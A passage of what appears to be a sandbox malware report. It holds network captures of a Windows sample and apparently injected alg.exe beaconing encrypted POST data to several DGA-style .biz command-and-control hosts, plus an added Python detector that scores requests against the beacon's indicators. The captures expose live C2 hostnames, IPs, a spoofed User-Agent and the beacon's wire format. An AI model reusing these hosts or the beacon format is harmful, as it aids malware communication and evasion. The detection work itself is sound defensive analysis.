Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:35.765120983 CET | 778 | OUT | Data Raw: d4 c9 9e 34 a6 62 e6 62 fe 02 00 00 c1 f5 47 dd 10 7a e9 06 fa 6f ff a1 c9 14 10 96 5c 2e 5d c8 51 c2 fd 76 b8 63 58 f8 76 96 37 83 63 c6 0f 9a ad 26 42 c0 12 ae 27 f0 f5 61 49 85 30 c9 f7 88 12 98 0b 4a 91 22 a0 3e e0 66 c5 07 e1 5b c2 ba 89 5f
Nov 26, 2024 08:15:36.907496929 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bb7d5794692eec416b712bfa6e44fac3|8.46.123.75|1732605336|1732605336|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.10 | 50076 | 13.251.16.150 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:37.379837036 CET | 349 | OUT | POST /yfqsba HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:37.379878998 CET | 834 | OUT | Data Raw: 55 d9 18 a7 05 ff 43 91 36 03 00 00 db 0d 40 64 fc 62 dd cb eb a4 d3 d6 c6 5b fd 36 d6 3c 1c 96 40 52 a0 dd f5 7c 45 e6 be 5e 82 f1 8c cb 19 f2 33 66 df 20 9d 6e b9 ba 09 c6 00 95 a3 cb 70 47 f5 58 b5 d6 af 13 d0 df 36 ff 40 29 21 cd 9c bd 13 27
Nov 26, 2024 08:15:39.486525059 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=adc7d6d134a3f69c72265fbbb1cdf631|8.46.123.75|1732605339|1732605339|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.10 | 50077 | 18.246.231.120 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:37.597898960 CET | 357 | OUT | POST /emfmvfownawowh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:37.598141909 CET | 778 | OUT | Data Raw: 71 87 54 2c 98 6b e0 2a fe 02 00 00 3d b9 f7 4c 8b 9f 66 cc e2 df 8e 70 41 05 70 be f9 cc 3e f8 93 85 24 e7 b2 bb e7 66 96 3c 37 86 2b a7 df 92 03 d1 d1 18 ce 85 b0 22 1c 03 e2 79 4a 73 7f 37 f7 b8 99 fd db 2f 40 00 7b dd 85 57 3f 75 42 6b b6 1a
Nov 26, 2024 08:15:39.005498886 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f61e3ead7ede2aa6c1644721670964f1|8.46.123.75|1732605338|1732605338|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.10 | 50078 | 3.254.94.185 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:39.691596031 CET | 353 | OUT | POST /dgxlfefuhlec HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:39.691596031 CET | 778 | OUT | Data Raw: 6f 8d 40 6f bc 3b b8 c2 fe 02 00 00 3c 9d 14 78 55 b9 ac 76 35 e7 3f df c5 06 61 26 50 35 02 74 9a 8e e4 32 4c ac 6e 28 af e5 e1 1d 70 05 29 6d 31 8f 10 30 a7 38 2e df bf ef 5d 18 3f f3 36 d6 81 ce 6e cc 28 31 cf 50 00 74 83 c0 e4 af f1 ca 11 ab
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o@o;<xUv5?a&P5t2Ln(p)m108.]?6n(1Pt?HK<+Uyet<*%k1Iwrkvno<9A1 R)~i7sS}tuP+\h[}THG9N-RQAO>Phx0Ba,Uw*g-jv.R2Fk
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122401953 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:40 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=64c566b4951bd70c44b85d0069830477|8.46.123.75|1732605340|1732605340|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.10 | 50079 | 34.211.97.45 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:39.770020962 CET | 343 | OUT | POST /vj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:39.770020962 CET | 834 | OUT | Data Raw: fb 33 31 b3 6a 82 b0 31 36 03 00 00 7b dd e3 33 d5 76 a1 02 3c 76 ee e9 01 de 1c 49 79 84 6f 79 ef 99 bd ca 26 58 37 4a 31 a0 28 df eb 74 65 17 3d 67 40 2c 7f 54 07 76 94 29 c5 8a 0d 98 bb 72 33 90 f2 f2 39 bc f1 9a 6f b3 b1 d5 12 9a 0d 0d 01 79
Data Ascii: 31j16{3v<vIyoy&X7J1(te=g@,Tv)r39oya/b6OuB;t2m>r=(Xo >$6W0gP+l1l-7 1"EiK!w'wlaAEaJu?<) 7)irw=<%SHI8}.yViJR
Nov 26, 2024 08:15:41.207277060 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7fafaf7504674fed4abe5db993f4abea|8.46.123.75|1732605340|1732605340|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.10 | 50080 | 3.94.10.34 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:41.477217913 CET | 355 | OUT | POST /txfroxnfrj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:41.477241993 CET | 834 | OUT | Data Raw: 19 7c 5d 51 a2 54 bd b7 36 03 00 00 19 c9 d6 88 b3 0d 26 48 77 88 56 a8 46 cc bd 9a 5c 40 d8 04 dc 8b 89 90 67 04 cf dd 27 2d 02 1a b4 35 92 be 2b 3f 00 0a 0b 1f e4 eb a1 ea 2b 2b 4e 1a 5b 72 01 ab 17 0b 29 24 9f 73 88 85 2b 33 b2 2a db 6e 38 3e
Data Ascii: |]QT6&HwVF\@g'-5+?++N[r)$s+3*n8>941::Q`4i]-c_.QC&llAg}Z/oH}-]?}gA?PVu'/s[lQi;/QJahfr`1,}@ex\QlB
Nov 26, 2024 08:15:42.573230028 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70401f75555acab33e2c59a4534bda54|8.46.123.75|1732605342|1732605342|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


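The POSTs above (to brsua.biz, esuzf.biz and gvijgjwkh.biz) share one request shape: a short, meaningless lowercase path on a short .biz host, the same WeChat/QQBrowser User-Agent on a Windows 7 Chrome 39 string, Cache-Control and Pragma both set to no-cache, and an opaque body that the nginx side acknowledges with an empty chunked 200. In every POST body shown, bytes 8 to 11 are a little-endian 32-bit value equal to Content-Length minus 12 (0x2fe = 766 for the 778-byte bodies, 0x336 = 822 for the 834-byte ones). The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses raw HTTP requests and scores them against those indicators. The sample requests are constructed from the capture (host, path, header order and the first 12 body bytes are copied from the sessions above; the rest of each body is zero padding standing in for the truncated payload), the benign request with its host and User-Agent is a placeholder, and the length-field check is a heuristic drawn from this capture rather than a documented protocol field.

```python
"""Beacon-shape detector for the HTTP POSTs captured above.

Added example, not part of the Joe Sandbox report. Sample requests are
constructed: host, path, headers and the first 12 body bytes come from the
report; the remaining body bytes are zero padding (placeholder).
"""
import re
import struct

# User-Agent sent on every beacon in the capture (WeChat/QQBrowser string on a Windows 7 UA).
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def body_length_field(body: bytes):
    """Return the little-endian uint32 at body offset 8, or None if the body is under 12 bytes.

    Heuristic taken from the capture: in every POST shown, this value equals
    len(body) - 12, i.e. an 8-byte prefix followed by a length-prefixed blob."""
    if len(body) < 12:
        return None
    return struct.unpack_from("<I", body, 8)[0]


def score_request(raw: bytes):
    """Return the names of the beacon indicators a single request matches."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if headers.get("user-agent") == BEACON_UA:
        hits.append("wechat_ua")
    if method == "POST" and re.fullmatch(r"/[a-z]{2,12}", path):
        hits.append("random_lowercase_path")
    if re.fullmatch(r"[a-z]{4,12}\.biz", headers.get("host", "")):
        hits.append("dga_like_biz_host")
    if headers.get("cache-control") == "no-cache" and headers.get("pragma") == "no-cache":
        hits.append("no_cache_pair")
    field = body_length_field(body)
    if field is not None and field == len(body) - 12:
        hits.append("length_prefixed_body")
    return hits


def is_beacon(raw: bytes, threshold: int = 4) -> bool:
    """Flag a request when it matches at least `threshold` of the five indicators."""
    return len(score_request(raw)) >= threshold


def build_post(host: str, path: str, body: bytes) -> bytes:
    """Assemble a request with the exact header order seen in the capture."""
    head = (
        f"POST {path} HTTP/1.1\r\n"
        "Cache-Control: no-cache\r\n"
        "Connection: Keep-Alive\r\n"
        "Pragma: no-cache\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {BEACON_UA}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode("latin-1") + body


def padded_body(prefix_hex: str, content_length: int) -> bytes:
    """First 12 bytes from the report, then zero padding (constructed) up to Content-Length."""
    prefix = bytes.fromhex(prefix_hex)
    return prefix + b"\x00" * (content_length - len(prefix))


# Constructed from the sessions above: host, path, first 12 body bytes, Content-Length.
SAMPLE_BEACONS = [
    build_post("brsua.biz", "/dgxlfefuhlec", padded_body("6f8d406fbc3bb8c2fe020000", 778)),
    build_post("esuzf.biz", "/vj", padded_body("fb3331b36a82b03136030000", 834)),
    build_post("gvijgjwkh.biz", "/txfroxnfrj", padded_body("197c5d51a254bdb736030000", 834)),
]

# Constructed benign request for contrast; host and User-Agent are placeholders, not from the report.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0 Safari/537.36\r\n"
    b"Accept: text/html\r\n\r\n"
)

if __name__ == "__main__":
    for req in SAMPLE_BEACONS + [BENIGN_REQUEST]:
        _, path, headers, _ = parse_request(req)
        print(headers.get("host"), path, score_request(req), is_beacon(req))
```

The threshold of four out of five is deliberate: the User-Agent alone is weak (it is a real WeChat embedded-browser string), and a no-cache header pair is common, but the combination with a random lowercase path, a short .biz host and the length-prefixed body is specific to this beacon. When feeding real traffic, reassemble each TCP stream first and hand the complete request bytes to score_request; a truncated body will fail the length-field check and the request will still be caught by the other four indicators.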
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.10 | 50081 | 185.214.228.140 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:42.306483984 CET | 347 | OUT | POST /ptd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:42.306483984 CET | 778 | OUT | Data Raw: 02 55 a5 4f 31 dc 1a 10 fe 02 00 00 48 58 19 74 c3 f8 2f ee f9 2d 83 c1 78 9f d0 bc 28 8a 7d eb b3 96 f8 f6 be 3e b5 60 ea 3b 2c ff 20 c8 32 53 5c b2 8d 6f f4 91 42 f2 ae 94 98 49 10 32 5e ee 5d 11 bf dd 73 68 e0 84 49 b1 9f ab ad fb f9 60 c1 44
Data Ascii: UO1HXt/-x(}>`;, 2S\oBI2^]shI`Dn2'*:yG^Jr9kr~b)/lUVQ)7&MvE=D[\W|Bwj~#.k:D .iH;qq.!)\BGCmkWx,.67R0
Nov 26, 2024 08:15:43.569173098 CET | 176 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Nov 2024 07:15:43 GMT
Content-Length: 19
Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
Data Ascii: 404 page not found
Nov 26, 2024 08:15:43.572458029 CET | 346 | OUT | POST /wm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:43.572499037 CET | 778 | OUT | Data Raw: c1 ce 4b 94 66 1d e5 70 fe 02 00 00 96 56 b6 9d 7f 9f 1e 8d ee 1d 57 7f 62 b4 34 91 d4 58 b0 17 db f3 e6 00 61 bd f5 39 e4 f1 e7 0f 7d ef 4c db c6 dc bd cb 7e 0d b0 37 5d ea 6f 60 45 41 2f 0b e1 73 48 f6 93 6e 24 b8 45 b6 df a5 0b e0 66 3d 79 58
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: KfpVWb4Xa9}L~7]o`EA/sHn$Ef=yXdnN>4b/)|yR"EOoXwxWnYHy4ap/Kc$QU!Ghp7mi`:!?4{{,6j*N[]!Qj hW^>&j|
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.975564957 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:43 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.10 | 50082 | 18.246.231.120 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:43.124553919 CET | 344 | OUT | POST /h HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:43.124608994 CET | 834 | OUT | Data Raw: 4c b1 b4 48 27 67 00 5a 36 03 00 00 88 93 d5 b5 23 fc f3 e5 a4 56 35 fa 01 73 ce 43 d7 51 97 35 92 c5 21 fe b4 1d 54 75 ae 38 28 40 4f 88 fd 89 f9 85 99 b4 2f fe 4a 92 27 6e e2 bd df aa 52 7c 47 91 a8 06 4d 7f 7f 1a a9 08 04 0e d0 d9 09 20 ff ce
Data Ascii: LH'gZ6#V5sCQ5!Tu8(@O/J'nR|GM )~Mo0*XDf\5G;)&L$t>v.+Xm=8&+I8@$r{0ud6=|.c"Mz>DqFQ^h4[P+-cw;%jg=dL;'Y+V5_*
Nov 26, 2024 08:15:44.237401009 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=033737c81f610ed78c01b73b3f33d754|8.46.123.75|1732605343|1732605343|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.10 | 50083 | 3.254.94.185 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:44.518590927 CET | 343 | OUT | POST /xp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:44.518657923 CET | 834 | OUT | Data Raw: 11 9b 6d 54 7a a9 a9 ac 36 03 00 00 03 f1 60 bf 8b b9 42 bc ef 42 46 1e 30 cd 08 b5 04 52 a5 bc 17 99 41 4c 38 16 b7 07 83 4a 59 22 8e 28 59 cf 92 53 6c ab 12 57 a1 58 73 23 1b f5 24 24 65 97 64 07 a9 43 1d 43 ee 56 c1 cb b0 07 1b 00 08 cb ab 41
Data Ascii: mTz6`BBF0RAL8JY"(YSlWXs#$$edCCVAr59O!(p39ZJK$!3~~tO!m!Z/wlAJdE&F^0z@O8H\Adir[oA|Dr|T07UF6x!Nam=Sa/E%z!Z
Nov 26, 2024 08:15:46.002470970 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=969585021325b3c0d38787939ed46f4b|8.46.123.75|1732605345|1732605345|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.10 | 50084 | 47.129.31.212 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:44.660553932 CET | 345 | OUT | POST /ym HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:44.660553932 CET | 778 | OUT | Data Raw: b1 06 ec ba 42 85 1c 63 fe 02 00 00 c5 89 d4 8e 2f 0a b4 00 96 5c 2a 40 98 82 6b f9 0e b1 54 a1 15 44 e6 c2 ee 00 e6 3a f4 8a f7 25 8e 90 72 e2 90 3f f3 45 31 ac 93 6b 5c 7b a1 07 34 3a d0 5b ec da a5 c5 de ea 69 aa b5 06 3e 42 b3 4f fa 6e c8 18
Data Ascii: Bc/\*@kTD:%r?E1k\{4:[i>BOn{5JAUHu[)D(z)$J*&<ZoTc-i>O1AlqW>\0C(-d<zp;d`.A0~Dsh#wj&G~O
Nov 26, 2024 08:15:46.717103004 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f0fa7bade7d8d7dba0de101d0f41aeaa|8.46.123.75|1732605346|1732605346|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.10 | 50085 | 85.214.228.140 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:46.278264046 CET | 353 | OUT | POST /fuqbdfcow HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:46.278384924 CET | 834 | OUT | Data Raw: 08 98 ee 0a cc f4 24 c7 36 03 00 00 4d 12 f0 b2 3c 62 a8 e8 cc bb 00 7d f5 45 d1 60 ed 57 df 80 54 b3 01 d6 66 c5 15 9e 12 38 96 cb c7 d1 55 1b 83 4c b2 2f fc 5c 48 72 82 96 1f de 3f 47 12 01 6c 8e b1 b9 d5 2e 7e d8 01 9a b1 74 3a b6 b0 ba ac 93
Data Ascii: $6M<b}E`WTf8UL/\Hr?Gl.~t:s=d!Kdv40ZKJd2t`//f=qMv(Yv66oNVV)$J`>ka);ik:g5L*hC
Nov 26, 2024 08:15:47.713120937 CET | 176 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Nov 2024 07:15:47 GMT
Content-Length: 19
Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
Data Ascii: 404 page not found
Nov 26, 2024 08:15:47.720133066 CET | 351 | OUT | POST /tkvhoyj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:47.720369101 CET | 834 | OUT | Data Raw: 06 29 8a 7d 0c 15 0b 67 36 03 00 00 ca e9 7b 88 ee 2f a0 46 80 25 b8 c9 7e df d3 c1 dc dc 33 d8 e8 20 8a 3f b3 15 8b 39 47 aa 9d f4 5d c5 04 5f 0c 29 76 19 16 c5 df 6c 5b 1b 87 f8 83 e1 bd 9b 36 33 9c d7 0e bb 2b 32 6b 21 f2 01 4e 83 db 4f cc a7
Data Ascii: )}g6{/F%~3 ?9G]_)vl[63+2k!NO+6G(>Lz7nL3Xe00@t1g!Q<FBXxpz\>+_39Oa==5p#O08AcuVoH2J9HS1u{ib7FC!d;>
Nov 26, 2024 08:15:48.275439024 CET | 176 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Nov 2024 07:15:48 GMT
Content-Length: 19
Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.10 | 50086 | 34.211.97.45 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:47.427215099 CET | 355 | OUT | POST /binfxyplqyoumy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
